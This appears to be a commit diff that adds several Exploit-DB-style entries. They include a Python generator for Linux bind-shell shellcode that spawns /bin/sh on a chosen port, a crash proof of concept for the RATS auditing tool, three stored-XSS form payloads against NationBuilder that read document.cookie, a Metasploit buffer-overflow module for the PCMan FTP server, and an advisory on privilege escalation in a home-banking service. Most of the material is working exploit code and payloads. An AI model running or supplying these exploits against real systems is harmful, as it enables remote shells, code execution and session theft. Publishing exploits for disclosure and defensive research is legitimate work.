400095: 66 c7 44 24 02 15 e0 movw $0xe015,0x2(%rsp) ;;;; 0xe015 - Port of 5600
|
||||
40009c: 54 push %rsp
|
||||
40009d: 5e pop %rsi
|
||||
40009e: 52 push %rdx
|
||||
40009f: 6a 10 pushq $0x10
|
||||
4000a1: 5a pop %rdx
|
||||
4000a2: 6a 31 pushq $0x31
|
||||
4000a4: 58 pop %rax
|
||||
4000a5: 0f 05 syscall
|
||||
4000a7: 50 push %rax
|
||||
4000a8: 5e pop %rsi
|
||||
4000a9: 6a 32 pushq $0x32
|
||||
4000ab: 58 pop %rax
|
||||
4000ac: 0f 05 syscall
|
||||
4000ae: 6a 2b pushq $0x2b
|
||||
4000b0: 58 pop %rax
|
||||
4000b1: 0f 05 syscall
|
||||
4000b3: 48 97 xchg %rax,%rdi
|
||||
4000b5: 6a 03 pushq $0x3
|
||||
4000b7: 5e pop %rsi
|
||||
4000b8: ff ce dec %esi
|
||||
4000ba: b0 21 mov $0x21,%al
|
||||
4000bc: 0f 05 syscall
|
||||
4000be: 75 f8 jne 0x4000b8
|
||||
4000c0: 48 31 c0 xor %rax,%rax
|
||||
4000c3: 99 cltd
|
||||
4000c4: 48 bb 2f 62 69 6e 2f movabs $0x68732f2f6e69622f,%rbx
|
||||
4000cb: 2f 73 68
|
||||
4000ce: 53 push %rbx
|
||||
4000cf: 54 push %rsp
|
||||
4000d0: 5f pop %rdi
|
||||
4000d1: 6a 3b pushq $0x3b
|
||||
4000d3: 58 pop %rax
|
||||
4000d4: 0f 05 syscall
|
||||
---------------------------------------------------------------------------------
|
||||
b4ck 2 h4ck --- Ajith Kp [@ajithkp560] --- http://www.terminalcoders.blogspot.com
|
||||
|
||||
Om Asato Maa Sad-Gamaya |
|
||||
Tamaso Maa Jyotir-Gamaya |
|
||||
Mrtyor-Maa Amrtam Gamaya |
|
||||
Om Shaantih Shaantih Shaantih |
|
||||
"""
|
||||
bann3r = '''
|
||||
[][][][][][][][][][][][][][][][][][][][][][][]
|
||||
[] []
|
||||
[] c0d3d by Ajith Kp [ajithkp560] []
|
||||
[] http://www.terminalcoders.blogspot.in []
|
||||
[] []
|
||||
[][][][][][][][][][][][][][][][][][][][][][][]
|
||||
'''
|
||||
print bann3r
|
||||
usage = "Usage: "+sys.argv[0]+" <port number (501<= port <= 9997)>"
|
||||
example = "Example: "+sys.argv[0]+" 5600"
|
||||
code1 = "\\x48\\x31\\xc0\\x48\\x31\\xf6\\x99\\x6a\\x29\\x58\\xff\\xc6\\x6a\\x02\\x5f\\x0f\\x05\\x48\\x97\\x6a\\x02\\x66\\xc7\\x44\\x24\\x02"
|
||||
code2 = "\\x54\\x5e\\x52\\x6a\\x10\\x5a\\x6a\\x31\\x58\\x0f\\x05\\x50\\x5e\\x6a\\x32\\x58\\x0f\\x05\\x6a\\x2b\\x58\\x0f\\x05\\x48\\x97\\x6a\\x03\\x5e\\xff\\xce\\xb0\\x21\\x0f\\x05\\x75\\xf8\\x48\\x31\\xc0\\x99\\x48\\xbb\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\\x53\\x54\\x5f\\x6a\\x3b\\x58\\x0f\\x05"
|
||||
if len(sys.argv)!=2:
|
||||
print usage
|
||||
print example
|
||||
else:
|
||||
port = "\\x"+("\\x").join([''.join(x) for x in zip(*[list(str(hex(socket.htons(int(sys.argv[1])))[2:])[z::2]) for z in range(2)])][::-1])#str(hex(socket.htons(int(sys.argv[1])))[2:])
|
||||
sh311code = code1 + port + code2
|
||||
print '// Port = '+sys.argv[0]+' --- (501<= port <= 9997)'
|
||||
print '// Compile with'
|
||||
print '// $ gcc -o output source.c'
|
||||
print '// $ execstack -s output'
|
||||
print '// $ ./output'
|
||||
print '// $ ./output'
|
||||
print '////////////////////////////////////////////\n'
|
||||
print '# include <stdio.h>'
|
||||
print 'char sh[] = "'+sh311code+'";'
|
||||
print 'main(int argc, char **argv)'
|
||||
print '''{
|
||||
int (*func)();
|
||||
func = (int (*)()) sh;
|
||||
(int)(*func)();'''
|
||||
print '}'
|
||||
print '\n////////////////////////////////////////////'
|
36
platforms/linux/dos/39733.py
Executable file
36
platforms/linux/dos/39733.py
Executable file
|
@ -0,0 +1,36 @@
|
|||
# Exploit Title: RATS 2.3 Crash POC
|
||||
# Date: 25th April 2016
|
||||
# Exploit Author: David Silveiro
|
||||
# Author Contact: twitter.com/david_silveiro
|
||||
# Website: Xino.co.uk
|
||||
# Software Link: https://code.google.com/archive/p/rough-auditing-tool-for-security/downloads
|
||||
# Version: RATS 2.3
|
||||
# Tested on: Ubuntu 14.04 LTS
|
||||
# CVE : 0 day
|
||||
|
||||
from shlex import split
|
||||
from os import system
|
||||
|
||||
|
||||
def crash():
|
||||
|
||||
try:
|
||||
com = ('rats --AAAA')
|
||||
return system(com)
|
||||
|
||||
except:
|
||||
print("Is RATS installed?")
|
||||
|
||||
|
||||
def main():
|
||||
|
||||
print("Author: David Silveiro ")
|
||||
print("Website: Xino.co.uk ")
|
||||
print("Title: POC RATS v2.3 Crash \n")
|
||||
|
||||
crash()
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
|
104
platforms/ruby/webapps/39730.txt
Executable file
104
platforms/ruby/webapps/39730.txt
Executable file
|
@ -0,0 +1,104 @@
|
|||
<!--
|
||||
|
||||
|
||||
NationBuilder Multiple Stored XSS Vulnerabilities
|
||||
|
||||
|
||||
Vendor: NATIONBUILDER WHQ
|
||||
Product web page: http://www.nationbuilder.com
|
||||
Affected version: unknown
|
||||
Platform: Ruby
|
||||
|
||||
Summary: NationBuilder is a unique nonpartisan community
|
||||
organizing system that brings together a comprehensive
|
||||
suite of tools that today's leaders and creators need to
|
||||
gather their tribes. Deeply social.
|
||||
|
||||
Desc: The application suffers from multiple stored XSS
|
||||
vulnerabilities. Input passed to several POST parameters
|
||||
is not properly sanitised before being returned to the
|
||||
user. This can be exploited to execute arbitrary HTML
|
||||
and script code in a user's browser session in context
|
||||
of an affected site.
|
||||
|
||||
Tested on: Apache/2.2.22 (Ubuntu)
|
||||
Phusion Passenger 4.0.48
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2016-5318
|
||||
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5318.php
|
||||
|
||||
Ruby client for NationBuilder API:
|
||||
https://github.com/nationbuilder/nationbuilder-rb
|
||||
|
||||
|
||||
11.04.2016
|
||||
|
||||
-->
|
||||
|
||||
|
||||
#1 Stored XSS in 'signup[note]' POST parameter
|
||||
----------------------------------------------
|
||||
#
|
||||
# PoC:
|
||||
#
|
||||
|
||||
<html>
|
||||
<body>
|
||||
<form action="https://domain.local/admin/signups/2/background?screen=signup-header" method="POST">
|
||||
<input type="hidden" name="utf8" value="%E2%9C%93" />
|
||||
<input type="hidden" name="authenticity_token" value="0ch5v8vyarO/yzmWoLWtOKBVpOjVVaQe/V8yg5jfNO8=" />
|
||||
<input type="hidden" name="signup[note]" value="<script>alert(onfirm(document.cookie)</script>" />
|
||||
<input type="hidden" name="commit" value="Save background" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
|
||||
|
||||
#2 Stored XSS in 'page_tag[name]' POST parameter
|
||||
------------------------------------------------
|
||||
#
|
||||
# PoC:
|
||||
#
|
||||
|
||||
<html>
|
||||
<body>
|
||||
<form action="https://domain.local/admin/sites/1/tags" method="POST">
|
||||
<input type="hidden" name="utf8" value="%E2%9C%93" />
|
||||
<input type="hidden" name="authenticity_token" value="0ch5v8vyarO/yzmWoLWtOKBVpOjVVaQe/V8yg5jfNO8=" />
|
||||
<input type="hidden" name="page_tag[name]" value="<script>confirm(document.cookie)</script>" />
|
||||
<input type="hidden" name="commit" value="Add tag" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
|
||||
|
||||
#3 Stored XSS in 'page[slug]' and 'page[headline]' POST parameters
|
||||
------------------------------------------------------------------
|
||||
#
|
||||
# PoC:
|
||||
#
|
||||
|
||||
<html>
|
||||
<body>
|
||||
<form action="https://domain.local/admin/sites/1/pages/12?screen=seo" method="POST">
|
||||
<input type="hidden" name="utf8" value="â" />
|
||||
<input type="hidden" name="_method" value="put" />
|
||||
<input type="hidden" name="authenticity_token" value="wAqOhULjnK8/H3ip+zE6yg3IHaGa6ggbjxOoN2tf30I=" />
|
||||
<input type="hidden" name="page[title]" value="Volunteer - ZSL" />
|
||||
<input type="hidden" name="page[slug]" value="volunteer_script_confirm_document_cookie_script" />
|
||||
<input type="hidden" name="page[headline]" value="Volunteer<script>confirm(document.cookie)</script>" />
|
||||
<input type="hidden" name="page[excerpt]" value="1" />
|
||||
<input type="hidden" name="commit" value="Save page" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
68
platforms/win32/remote/39729.rb
Executable file
68
platforms/win32/remote/39729.rb
Executable file
|
@ -0,0 +1,68 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
## Original Exploit Information ##
|
||||
# Date: 29 Aug 2015
|
||||
# Exploit Author: Koby
|
||||
# Tested on: Windows XP SP3
|
||||
# Link: https://www.exploit-db.com/exploits/38013/
|
||||
|
||||
## Software Information ##
|
||||
# Vendor Homepage: http://pcman.openfoundry.org/
|
||||
# Software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z
|
||||
# Version: 2.0.7
|
||||
|
||||
## Metasploit Module Information ##
|
||||
# Date: 16 April 2016
|
||||
# Exploit Author: Jonathan Smith
|
||||
# Tested on: Windows XP SP2
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
include Msf::Exploit::Remote::Ftp
|
||||
|
||||
def initialize(info = {})
|
||||
|
||||
super(update_info(info,
|
||||
|
||||
'Name' => 'PCMan RENAME overflow',
|
||||
|
||||
'Description' => 'This module exploits a buffer overflow in the RENAME command of PCMAN FTP Server 2.0.7. This requires authentication but anonymous credentials are enabled by default.',
|
||||
|
||||
'Author' => [ 'Metasploit module author: Jonathan Smith. Vulnerability originally discovered by Koby on 29 August 2015. Metasploit module developed 16 April 2016.'],
|
||||
|
||||
'Version' => '$Revision: 1 $',
|
||||
|
||||
'Platform' => ['win'],
|
||||
|
||||
'Targets' => [ [ 'Windows XP SP2', { } ],],
|
||||
|
||||
'DefaultTarget' => 0,
|
||||
|
||||
'License' => GPL_LICENSE,
|
||||
|
||||
'Payload' => {'BadChars' => "\x00\x0a\x0d"},
|
||||
|
||||
'DefaultOptions' => {'EXITFUNC' => 'process'}
|
||||
|
||||
))
|
||||
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
||||
connect_login
|
||||
|
||||
exploitcode = "A" * 2004 + "\x65\x82\xA5\x7C" + make_nops(30) + payload.encoded
|
||||
|
||||
send_cmd( ['RENAME', exploitcode] , false )
|
||||
|
||||
disconnect
|
||||
|
||||
end
|
||||
|
||||
end
|
54
platforms/windows/local/39727.txt
Executable file
54
platforms/windows/local/39727.txt
Executable file
|
@ -0,0 +1,54 @@
|
|||
# Exploit Title: CompuSource Systems - Real Time Home Banking - Local
|
||||
Privilege Escalation/Arbitrary Code Execution
|
||||
# Date: 2/25/16
|
||||
# Exploit Author: singularitysec@gmail.com
|
||||
# Vendor Homepage: https://www.css4cu.com
|
||||
# : https://www.css4cu.com/Next/InfoSide/SoftwareSolutions.php
|
||||
# Version: CompuSource Systems - Real Time Home Banking
|
||||
# Tested on: Windows 7
|
||||
# CVE : TBD
|
||||
|
||||
Note: Windows Server 2003/2008/2012 *may* be vulnerable, depending on
|
||||
system configuration.
|
||||
|
||||
This vulnerability has been reference checked against multiple installs.
|
||||
This configuration was identical across all systems tested.
|
||||
|
||||
Executables/Services:
|
||||
|
||||
%SystemRoot%/css50/csdir/RealTimeHomeBankingSvc.exe
|
||||
HomeBankingService
|
||||
|
||||
Attack Detail:
|
||||
The application installs with LOCAL SYSTEM service credentials in the
|
||||
directory %SystemRoot%/css50/csdir
|
||||
|
||||
|
||||
The executables that are installed, by default, allow AUTHENTICATED USERS
|
||||
to modify, replace or alter the file. This would allow an attacker to
|
||||
inject their code or replace the executable and have it run in the context
|
||||
of the system.
|
||||
|
||||
|
||||
This would allow complete compromise of a machine on which it was
|
||||
installed, giving the process LOCAL SYSTEM access to the machine in
|
||||
question. An attacker can replace the file or append code to the
|
||||
executable, reboot the system or restart the service and it would then
|
||||
compromise the machine. As LOCAL SYSTEM is the highest privilege level on a
|
||||
machine, this allows total control and access to all parts of the system.
|
||||
|
||||
|
||||
Remediation:
|
||||
|
||||
Remove the modify/write permissions on the executables to allow only
|
||||
privileged users to alter the files.
|
||||
Apply vendor patch when distributed.
|
||||
|
||||
Vulnerability Discovered: 2/25/16
|
||||
|
||||
Vendor Notified: 2/25/16
|
||||
|
||||
|
||||
Website: www.information-paradox.net
|
||||
This vulnerability was discovered by singularitysec@gmail.com. Please
|
||||
credit the author in all references to this exploit.
|
Loading…
Add table
Reference in a new issue